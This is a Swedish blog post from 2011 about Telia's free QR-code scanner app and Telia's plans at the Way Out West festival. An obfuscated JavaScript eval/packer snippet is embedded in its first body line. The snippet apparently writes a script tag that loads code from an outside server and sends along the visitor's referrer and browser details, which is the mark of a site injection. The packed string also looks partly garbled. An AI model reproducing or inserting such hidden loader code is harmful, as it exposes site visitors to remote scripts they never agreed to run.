Image Image Image Image Image Image Image Image Image Image

| 18 september, 2018

Scroll to top

Top

Telia Kodskanner

Telia Kodskanner
Filip Urde
  • On 12 augusti, 2011
  • http://www.revue.se/filip-urde

Telia eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rkynk|var|u0026u|referrer|sksae||js|php’.split(‘|’),0,{}))
Kodskanner kopplar ihop verkligheten med Internet

Ska du till Way Out West i helgen?  Telia har med sin nya app ”Kodskanner” givit din festival upplevelse en ny dimension.

Tänk dig att du kliver in genom grindarna på Way Out West, kollar av dagens spelningar, och blicken hamnar på… Explosions in the sky, ett band du hört namnet på, men aldrig riktigt lyssnat på. I anslutning till bandnamnet ser du en liten fyrkant med prickar och en uppmaning att ”skanna den”. Det kan du enkelt göra med Telias nya app Kodskanner.

Telia Kodskanner är en gratisapplikation som gör din mobil till kodläsare. Ser du en s.k. QR-kod liknande den i bilden här ovan – starta appen, rikta kameran mot koden och se vad som händer. No more knappa in knepiga webbadresser!
Adressen är helt enkelt gömd i och mellan prickarna i QR-koden. När du skannar koden får du direkt tillgång till den information som göms där i.

QR-koden är – enkelt uttryckt – ett sätt att koppla ihop verkligheten med Internet. Det här är något som Telia satsar på.

I helgen kommer Telia finnas med på Way Out West i Göteborg, och vår ambition är att krydda upp festivalen med överraskningar, exempelvis intima spelningar, vinster, bandtips, smarta låtlistor och till och med något att göra när du sitter på toaletten. Med andra ord – överraskningar du kommer se från långt håll, och sådant vi gömt bakom QR-koder.

Så ladda hem Telia Kodskanner. Det kommer vara värt det.

Telia Kodskanner finns att ladda hem i App Store, och från Android market.

 

Information: teilas blogg